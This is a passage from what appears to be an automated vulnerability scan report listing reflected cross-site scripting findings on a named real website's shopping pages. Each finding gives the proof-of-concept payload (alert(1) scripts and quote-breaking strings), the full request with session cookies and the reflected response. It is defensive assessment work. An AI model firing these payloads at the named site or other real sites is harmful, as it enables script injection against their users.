<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishings8ce98<script>alert(1)</script>c2ed3248485 <a href="#" id="backlink">
...[SNIP]...

4.978. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d32f'-alert(1)-'bfb49ae926 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings8d32f'-alert(1)-'bfb49ae926/4120758082/Antiques-Collectibles/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:15:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishings8d32f'-alert(1)-'bfb49ae926/4120758082/Antiques-Collectibles/1';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.979. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1dd37'-alert(1)-'f03c05fd27d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/41207580821dd37'-alert(1)-'f03c05fd27d/Antiques-Collectibles/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:18:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishings/41207580821dd37'-alert(1)-'f03c05fd27d/Antiques-Collectibles/1';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.980. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62a4f'-alert(1)-'f295ff77627 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles62a4f'-alert(1)-'f295ff77627/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:23:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Home-Furnishings/4120758082/Antiques-Collectibles62a4f'-alert(1)-'f295ff77627/1';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.981. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9217c'-alert(1)-'c47ec416d99 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/19217c'-alert(1)-'c47ec416d99 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:28:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/19217c'-alert(1)-'c47ec416d99';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.982. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a7b3"><a>247829c505e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping2a7b3"><a>247829c505e/Home-Furnishings/4120758082/Art/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:19:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping2a7b3"><a>247829c505e">
...[SNIP]...

4.983. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea5bc'-alert(1)-'b56e3f4b579 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppingea5bc'-alert(1)-'b56e3f4b579/Home-Furnishings/4120758082/Art/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:25:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shoppingea5bc'-alert(1)-'b56e3f4b579/Home-Furnishings/4120758082/Art/2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.984. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a2634<script>alert(1)</script>37645397f51 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingsa2634<script>alert(1)</script>37645397f51/4120758082/Art/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:31:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingsa2634<script>alert(1)</script>37645397f51 <a href="#" id="backlink">
...[SNIP]...

4.985. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd7c0'-alert(1)-'72d10295555 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishingsdd7c0'-alert(1)-'72d10295555/4120758082/Art/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:29:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishingsdd7c0'-alert(1)-'72d10295555/4120758082/Art/2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.986. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79bf1'-alert(1)-'70f948b9db2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/412075808279bf1'-alert(1)-'70f948b9db2/Art/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:37:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/412075808279bf1'-alert(1)-'70f948b9db2/Art/2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.987. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99692'-alert(1)-'1454fc4861e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Art99692'-alert(1)-'1454fc4861e/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:42:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Home-Furnishings/4120758082/Art99692'-alert(1)-'1454fc4861e/2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.988. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de367'-alert(1)-'5c293ecee8a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Home-Furnishings/4120758082/Art/2de367'-alert(1)-'5c293ecee8a HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:46:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082/Art/2de367'-alert(1)-'5c293ecee8a';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.989. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cef3"><a>b68671e9af6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping2cef3"><a>b68671e9af6/Home-Furnishings/4120758082/Bedroom-Accessories/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:09:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping2cef3"><a>b68671e9af6">
...[SNIP]...

4.990. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7abcd'-alert(1)-'cece5242a0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping7abcd'-alert(1)-'cece5242a0c/Home-Furnishings/4120758082/Bedroom-Accessories/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:16:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping7abcd'-alert(1)-'cece5242a0c/Home-Furnishings/4120758082/Bedroom-Accessories/51';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.991. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2acdd'-alert(1)-'35281a32492 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

